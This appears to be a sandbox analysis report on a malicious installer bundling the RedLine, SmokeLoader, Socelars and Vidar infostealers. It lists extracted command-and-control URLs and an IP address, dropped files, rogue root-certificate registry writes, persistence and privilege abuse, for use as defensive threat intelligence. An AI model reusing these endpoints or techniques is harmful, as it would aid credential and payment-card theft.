redline | 3cf08993fa4866df41dc37cec849e5a5e9d0bcb6ea6660c30130d9e2fd2f623d

Resubmissions

11-09-2021 09:47

210911-lr7snabca6 10

10-09-2021 20:48

210910-zlwebsaeh8 10

Analysis

max time kernel
33s
max time network
607s
platform
windows7_x64
resource
win7v20210408
submitted
10-09-2021 20:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

4.4MB
MD5

65eed0fdbee8b81c1b9118f86700c6fd
SHA1

fcca1e88a99e2f20403e963b798e3f68f58d638d
SHA256

3cf08993fa4866df41dc37cec849e5a5e9d0bcb6ea6660c30130d9e2fd2f623d
SHA512

f4c88eea9b410ea353ca9dc10c97dcfb360f9ef115d17eca1f12a4a702bc0b787cf48bfb2e6d993b8ad64ff4a0f9a2165d70eb1ae7b48652a3f5d8862543b3ac

Score

10^/10

redline smokeloader socelars vidar 706 pab123 aspackv2 backdoor infostealer stealer trojan

Malware Config

Extracted

Family

vidar

Version

40.5

Botnet

706

https://gheorghip.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

pab123

45.14.49.169:22411

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3260	2636	rundll32.exe	71
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1748	2636	rundll32.exe	71
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3164	2636	rUNdlL32.eXe	71

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

resource	yara_rule
behavioral3/memory/472-237-0x0000000002E60000-0x0000000002E7F000-memory.dmp	family_redline
behavioral3/memory/472-255-0x0000000004980000-0x000000000499E000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 3 IoCs

resource	yara_rule
behavioral3/files/0x00030000000130c9-151.dat	family_socelars
behavioral3/files/0x00030000000130c9-141.dat	family_socelars
behavioral3/files/0x00030000000130c9-114.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral3/memory/872-220-0x0000000000400000-0x00000000021B7000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral3/files/0x00030000000130cb-77.dat	aspack_v212_v242
behavioral3/files/0x00030000000130ca-79.dat	aspack_v212_v242
behavioral3/files/0x00030000000130ca-78.dat	aspack_v212_v242
behavioral3/files/0x00030000000130cb-76.dat	aspack_v212_v242
behavioral3/files/0x00030000000130cd-83.dat	aspack_v212_v242
behavioral3/files/0x00030000000130cd-82.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 15 IoCs

pid	Process
1164	setup_installer.exe
1264	setup_install.exe
872	Fri192902b3c24.exe
1640	Fri19d30056588.exe
332	Fri195cd4dbfdf37897.exe
1044	Fri192b9eeaa03b.exe
1596	DllHost.exe
1992	Fri1921f7a9d3.exe
1976	Fri19b9b73e83c948b1d.exe
1628	Fri192f077acf656dd.exe
1324	Fri192c305b4a.exe
1624	Fri191454c4b4.exe
472	Fri19927b4fe38a9d1.exe
432	Fri195cd4dbfdf37897.tmp
868	Fri19ca03f05489b.exe

Loads dropped DLL 49 IoCs

pid	Process
1036	setup_x86_x64_install.exe
1164	setup_installer.exe
1164	setup_installer.exe
1164	setup_installer.exe
1164	setup_installer.exe
1164	setup_installer.exe
1164	setup_installer.exe
1264	setup_install.exe
1264	setup_install.exe
1264	setup_install.exe
1264	setup_install.exe
1264	setup_install.exe
1264	setup_install.exe
1264	setup_install.exe
1264	setup_install.exe
576	cmd.exe
576	cmd.exe
1464	cmd.exe
1512	cmd.exe
1256	cmd.exe
1256	cmd.exe
528	cmd.exe
872	Fri192902b3c24.exe
872	Fri192902b3c24.exe
600	cmd.exe
332	Fri195cd4dbfdf37897.exe
332	Fri195cd4dbfdf37897.exe
1596	DllHost.exe
1596	DllHost.exe
1516	cmd.exe
1516	cmd.exe
1400	cmd.exe
440	cmd.exe
1548	cmd.exe
1976	Fri19b9b73e83c948b1d.exe
1976	Fri19b9b73e83c948b1d.exe
1628	Fri192f077acf656dd.exe
1628	Fri192f077acf656dd.exe
1384	cmd.exe
1384	cmd.exe
1360	cmd.exe
332	Fri195cd4dbfdf37897.exe
472	Fri19927b4fe38a9d1.exe
472	Fri19927b4fe38a9d1.exe
1640	Fri19d30056588.exe
1640	Fri19d30056588.exe
432	Fri195cd4dbfdf37897.tmp
432	Fri195cd4dbfdf37897.tmp
432	Fri195cd4dbfdf37897.tmp

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 9 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ipinfo.io
71	ipinfo.io
212	freegeoip.app
214	freegeoip.app
8	ipinfo.io
11	ip-api.com
74	ipinfo.io
209	freegeoip.app
211	freegeoip.app

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
2396	2720	WerFault.exe	73
3180	2884	WerFault.exe	76
3220	2596	WerFault.exe	70
3296	872	WerFault.exe	49
3328	2956	WerFault.exe	77
3628	2244	WerFault.exe	61

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DllHost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DllHost.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DllHost.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1004	schtasks.exe
3876	schtasks.exe
3764	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3364	timeout.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
2340	taskkill.exe
2500	taskkill.exe
3000	taskkill.exe
1972	taskkill.exe
748	taskkill.exe
3340	taskkill.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Fri191454c4b4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e210f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Fri191454c4b4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Fri19d30056588.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Fri19d30056588.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Fri192902b3c24.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Fri191454c4b4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Fri192902b3c24.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Fri19d30056588.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Fri19d30056588.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Fri192902b3c24.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
3680	PING.EXE
3960	PING.EXE

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	72	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
1596	DllHost.exe
1596	DllHost.exe
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1596	DllHost.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	1640	Fri19d30056588.exe
Token: SeAssignPrimaryTokenPrivilege	1640	Fri19d30056588.exe
Token: SeLockMemoryPrivilege	1640	Fri19d30056588.exe
Token: SeIncreaseQuotaPrivilege	1640	Fri19d30056588.exe
Token: SeMachineAccountPrivilege	1640	Fri19d30056588.exe
Token: SeTcbPrivilege	1640	Fri19d30056588.exe
Token: SeSecurityPrivilege	1640	Fri19d30056588.exe
Token: SeTakeOwnershipPrivilege	1640	Fri19d30056588.exe
Token: SeLoadDriverPrivilege	1640	Fri19d30056588.exe
Token: SeSystemProfilePrivilege	1640	Fri19d30056588.exe
Token: SeSystemtimePrivilege	1640	Fri19d30056588.exe
Token: SeProfSingleProcessPrivilege	1640	Fri19d30056588.exe
Token: SeIncBasePriorityPrivilege	1640	Fri19d30056588.exe
Token: SeCreatePagefilePrivilege	1640	Fri19d30056588.exe
Token: SeCreatePermanentPrivilege	1640	Fri19d30056588.exe
Token: SeBackupPrivilege	1640	Fri19d30056588.exe
Token: SeRestorePrivilege	1640	Fri19d30056588.exe
Token: SeShutdownPrivilege	1640	Fri19d30056588.exe
Token: SeDebugPrivilege	1640	Fri19d30056588.exe
Token: SeAuditPrivilege	1640	Fri19d30056588.exe
Token: SeSystemEnvironmentPrivilege	1640	Fri19d30056588.exe
Token: SeChangeNotifyPrivilege	1640	Fri19d30056588.exe
Token: SeRemoteShutdownPrivilege	1640	Fri19d30056588.exe
Token: SeUndockPrivilege	1640	Fri19d30056588.exe
Token: SeSyncAgentPrivilege	1640	Fri19d30056588.exe
Token: SeEnableDelegationPrivilege	1640	Fri19d30056588.exe
Token: SeManageVolumePrivilege	1640	Fri19d30056588.exe
Token: SeImpersonatePrivilege	1640	Fri19d30056588.exe
Token: SeCreateGlobalPrivilege	1640	Fri19d30056588.exe
Token: 31	1640	Fri19d30056588.exe
Token: 32	1640	Fri19d30056588.exe
Token: 33	1640	Fri19d30056588.exe
Token: 34	1640	Fri19d30056588.exe
Token: 35	1640	Fri19d30056588.exe
Token: SeDebugPrivilege	1624	Fri191454c4b4.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
432	Fri195cd4dbfdf37897.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1036 wrote to memory of 1164	1036	setup_x86_x64_install.exe	26
PID 1036 wrote to memory of 1164	1036	setup_x86_x64_install.exe	26
PID 1036 wrote to memory of 1164	1036	setup_x86_x64_install.exe	26
PID 1036 wrote to memory of 1164	1036	setup_x86_x64_install.exe	26
PID 1036 wrote to memory of 1164	1036	setup_x86_x64_install.exe	26
PID 1036 wrote to memory of 1164	1036	setup_x86_x64_install.exe	26
PID 1036 wrote to memory of 1164	1036	setup_x86_x64_install.exe	26
PID 1164 wrote to memory of 1264	1164	setup_installer.exe	27
PID 1164 wrote to memory of 1264	1164	setup_installer.exe	27
PID 1164 wrote to memory of 1264	1164	setup_installer.exe	27
PID 1164 wrote to memory of 1264	1164	setup_installer.exe	27
PID 1164 wrote to memory of 1264	1164	setup_installer.exe	27
PID 1164 wrote to memory of 1264	1164	setup_installer.exe	27
PID 1164 wrote to memory of 1264	1164	setup_installer.exe	27
PID 1264 wrote to memory of 1472	1264	setup_install.exe	29
PID 1264 wrote to memory of 1472	1264	setup_install.exe	29
PID 1264 wrote to memory of 1472	1264	setup_install.exe	29
PID 1264 wrote to memory of 1472	1264	setup_install.exe	29
PID 1264 wrote to memory of 1472	1264	setup_install.exe	29
PID 1264 wrote to memory of 1472	1264	setup_install.exe	29
